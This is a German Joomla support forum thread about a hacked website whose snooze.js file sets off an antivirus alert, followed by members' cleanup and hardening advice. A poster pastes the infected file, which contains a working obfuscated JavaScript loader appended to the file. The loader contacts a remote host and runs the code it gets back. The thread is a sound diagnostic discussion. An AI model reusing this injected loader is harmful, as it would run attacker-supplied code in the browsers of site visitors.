Trojan:Win32/Phonzy.B!ml wird auf Webseite gefunden

hajo808 · 27. April 2022

Hallo,

wir haben von einem Kunden die Benachrichtigung bekommen, dass er auf unserer Seite eine Virusmeldung bekommt.

Da wir keine Meldung bekommen, haben wir aus Spaß via Akeeba ein aktuelles Backup erstellt. Dieses haben wir dann bei Virustotal hochgeladen. Keine Funde. Auch die Webseite direkt mit Virustotal scannen hat kein Ergebnis erbracht. Als Nächstes haben wir probiert, das Backup lokal zu entpacken. Auf einmal ist der Windows Defender angesprungen.

Meldung:

Trojan:Win32/Phonzy.B!ml in C:\xampp\htdocs\6\media\plg_quickicon_eos310\js\snooze.js gefunden

Weiß jemand, wie man sich das einfangen kann und wie man es wieder loswird? Wir halten Joomla eigentlich immer aktuell. Wenn ich ein Backup einspiele, wo nicht der Defender anspringt, weiß ich noch immer nicht, wie die ins System kommen. Auch werden keine Updates im Backend angezeigt.

[URL removed by moderator]

Joomla: 3.10.8

Gantry5, Versla Tpl 1.5.0

Gr

eumel1602 · 27. April 2022

Schaue mal in die forumsanleitungen und gib mal paar infos zu deinem System

EDIT: die Datei gibts in Joomla "immer" ! wie ist denn der inhalt der datei ?

hajo808 · 27. April 2022

Code

/**
 * @copyright   (C) 2021 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

 (function ($)
 {
     $(document).ready(function ()
     {
         var ajaxData = {
             'option' : 'com_ajax',
             'group'  : 'quickicon',
             'plugin' : 'SnoozeEOS',
             'format' : 'json'
         }

         $('#system-message-container').on('click', '.eosnotify-snooze-btn', function(e)
         {
             var button=$(this);
             $.getJSON('index.php', ajaxData, function(response)
             {
                 if (response.success)
                 {
                     button.closest('.alert').find('[data-dismiss="alert"]').click();
                 }
             }
         );
         e.preventDefault();
         });
     });
 })(jQuery);
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//bbfw.org/components/components.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Alles anzeigen

Hier der Inhalt der snooze.js.

Nachtrag:

Joomla: 3.10.8

Gantry5, Versla Tpl 1.5.0

PHP 8, MySQL 5.5

hajo808 · 27. April 2022

Es wurde noch mehr gefunden.

drmenzelit · 27. April 2022

Ich würde ein Joomla 3 Paket herunterladen, auspacken und die Dateien vergleichen.
Die snooze.js Datei ist auf jedem Fall verändert worden.

flotte · 27. April 2022

Das ist auf solche Fragen noch mal antworten muss....
Anleitungen was bei gehackten Joomla zu tun ist, gibt es mittlerwele viele.

Es macht keinen Sinn einfach blind Dateien zu ersetzen, wenn man nicht weiss wie der Hack passiert ist und welche Sicherheitslücke gestopft werden muss. Im Gegenteil, man versaut sich die Analysemöglichkeiten!

Meine Website wurde gehackt - was tun?

@hajo808

Nimm den Linkk aus Deinem Posting, falls das die gehackte Seite ist. Oder willst Du Dritte verseuchen??? Wer weiss was passiert, wenn man die Seite aufruft.

hajo808 · 27. April 2022

Wir haben jetzt auf frischer Datenbank (MySQL 5.7) ein Backup eingespielt, wo lokal kein Virenscanner angesprungen ist. Folgende Updates wurden uns danach angeboten.

Update für: Joomla Version: 3.10.8 gefunden
Update für: JCE 2.9.22 Version: 2.9.22 gefunden
Update für: Regular Labs - Cache Cleaner Version: 8.1.1 gefunden
Update für: Akeeba Backup Core package Version: 8.1.3 gefunden

Wir haben alle Updates eingespielt und neue Passwörter vergeben. Nur bleibt nur zu hoffen, dass es nicht wieder vorkommt, da wir das Einfallstor nicht kennen.

hajo808 · 27. April 2022

@flotte

Können wir nicht mehr editieren.

christine2 · 27. April 2022

Zitat von hajo808

@flotte

Können wir nicht mehr editieren.

Es gibt einen Button: Inhalt melden. Hab's Administrator gemeldet.

Liebe Grüße
Christine

zero24 · 27. April 2022

URL ist raus

Lui_brempt · 27. April 2022

Auch mal geschaut, ob noch alte Erweiterungen vorhanden sind, die nicht gebraucht werden. Diese können Sicherheitslücken haben, die, weil die Erweiterung nicht weiterentwickelt wird, nicht behoben werden. Das fällt aber dann auch erst im Falle eines Hacks auf.

hajo808 · 27. April 2022

Eigentlich benutzen wir immer nur das, was wir brauchen. Ich schau aber gerne morgen nochmal darüber.

Anbei noch ein Joomscan von außen.

[+] FireWall Detector

[++] Firewall not detected

[+] Detecting Joomla Version

[++] Joomla 3.10.8

[+] Core Joomla Vulnerability

[++] Target Joomla core is not vulnerable

[+] Checking apache info/status files

[++] Readable info/status files are not found

[+] admin finder

[++] Admin page : https://fff-.org/administrator/

[+] Checking robots.txt existing

[++] robots.txt is found

path : https://fff-.org/robots.txt

Interesting path found from robots.txt

https://fff-.org/administrator/

https://fff-.org/bin/

https://fff.org/cache/

https://fff-.org/cli/

https://fff-.org/components/

https://fff-.org/includes/

https://fff-.org/installation/

https://fff-.org/language/

https://fff-.org/layouts/

https://fff-.org/libraries/

https://fff-.org/logs/

https://fff-.org/modules/

https://fff-.org/plugins/

https://fff-.org/tmp/

[+] Finding common backup files name

[++] Backup files are not found

[+] Finding common log files name

[++] error log is not found

[+] Checking sensitive config.php.x file

[++] Readable config files are not found

[+] Enumeration component (com_akeeba)

[++] Name: com_akeeba

Location : https://fff-.org/components/com_akeeba/

flotte · 28. April 2022

Wenn ich das bislang richtig verfolgt habe ist niemand auf die Idee gekommen mal systematisch eine Analyse durchzuführen. Ein "Joomscan von außen" durchzuführen ist doch -sorry- völlig nutzlos. Ebenso das sofortige Rückspielen irgendwelcher Backups. Mit so wenig Fachwissen, wäre es am sinnvollsten gewesen sich an Experten zu wenden. Alleine die Veröffentlichung(!) von URLs augenscheinlich gehackter(!) Webs zeigt mir ein vollkommen naives und geradezu grob fahrlässiges Verhalten. Mir fehlen fast die Worte...

Ich möchte wirklich nicht überheblich erscheinen, aber ein ganz simples "Joomla gehackt" bei Google eingegeben hätte schon geholfen.

Ich hoffe die Seite ist nun wirklich offline (nicht nur mit via Joomla-Backend offline schalten), sondern _wirklich_ offline und es kümmert sich nun jemand mit Sachverstand. Es gibt genug Anlaufstellen dafür - auch hier im Forum tummeln sich mehrere Anbieter dieser Art. Ich kann gerne Kontakte empfehlen - via PM.

JoomlaWunder · 28. April 2022

Zitat von hajo808

Eigentlich benutzen wir immer nur das, was wir brauchen. Ich schau aber gerne morgen nochmal darüber.

Nicht benutzte Drittanbieter-Erweiterungen müssten dann aber auch wirklich deinstalliert und nicht nur deaktiviert werden.

Oft befinden sich neben dem Joomla-Projekt noch viele andere selbst angelegte Verzeichnisse mit Test/Demo-Installationen sowie mehrere Datenbanken bzw. DB-Tabellen mit anderen Präfixes auf dem Webspace. Auch hierüber könnten Webseiten gehackt werden.
Nicht zu vergessen wäre der eigene Rechner. Auch dieser sollte "sauber" sein und die Software wie z.B. FileZilla sollte immer aktuell gehalten werden.
Auch Bilder und Datenbanken könnten Schädlinge enthalten. Das Ganze ist wirklich nicht ganz trivial.

War denn wenigstens das administrator-Verzeichnis per zusätzlichem Passwortschutz geschützt?

kitepascal · 29. April 2022

Liegt auf dem Webspace auch ein WordPress?

Diese if(ndsw===undefined) Injection in sämtlichen JS Files kenne ich zur Genüge von meinen WordPress Kunden.

Durch eine Joomla Lücke gehackte Seiten gibt es so gut wie gar nicht mehr.

Generell empfiehlt es sich, mehrere Website Instanzen/Software Installationen isoliert voneinander zu betreiben. Das geht leider nicht bei allen Hostern.

WordPress absichern, wenn neu aufgesetzt/altes Backup wiederhergestellt/bereinigt, klappt so am besten:

WordPress absichern - Sicherheit erhöhen per .htaccess + Firewall

WordPress absichern: Leicht verständlich - einfache Schritte, um WordPress sicherer zu machen. Login Schutz, Firewall & .htaccess.

website-bereinigung.de